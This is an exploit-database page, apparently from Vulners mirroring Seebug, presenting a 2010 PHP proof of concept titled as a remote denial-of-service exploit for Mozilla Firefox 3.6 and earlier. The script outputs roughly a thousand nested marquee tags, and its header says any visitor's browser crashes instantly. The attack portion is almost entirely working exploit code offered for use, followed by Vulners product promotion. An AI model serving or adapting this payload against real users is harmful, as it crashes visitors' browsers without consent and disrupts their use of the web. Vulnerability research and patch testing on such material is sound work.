Lucene search
K

Mozilla Firefox <= 3.6 - Denial of Service Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 29 Views

Mozilla Firefox Denial of Service Exploit targeting versions <= 3.

Code

                                                &#60;?php

/*
*    Title: Mozilla Firefox &#60;=3.6 - Remote Denial Of Service Exploit
*    Date: 25/02/10
*    Author: Ale46 - ale46[at]paranoici[dot]org
*    Software Link: http://www.mozilla-europe.org/en/firefox/
*    Version: 3.6 and 3.5.8 are vulnerable so I think that all versions &#60;= 3.6 have the same issue
*    Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
*    Description: visiting this php page you&#39;ll get an instant crash of Firefox
*    Greetz: Gandalf
*    Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful &#39;s irony)
*/

$a = &#39;&#60;marquee&#62;&#39;;
$b = &#39;&#60;/marquee&#62;&#39;;

for ($i=0;$i&#60;=1000;$i++){
    $a .= &#39;&#60;marquee&#62;&#39;;
    $b .= &#39;&#60;/marquee&#62;&#39;;
}

echo &#39;&#60;body&#62;&#39;;
echo $a;
echo &#34;hadouken!&#34;;
echo $b;
echo &#39;&#60;/body&#62;&#39;;

?&#62;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
29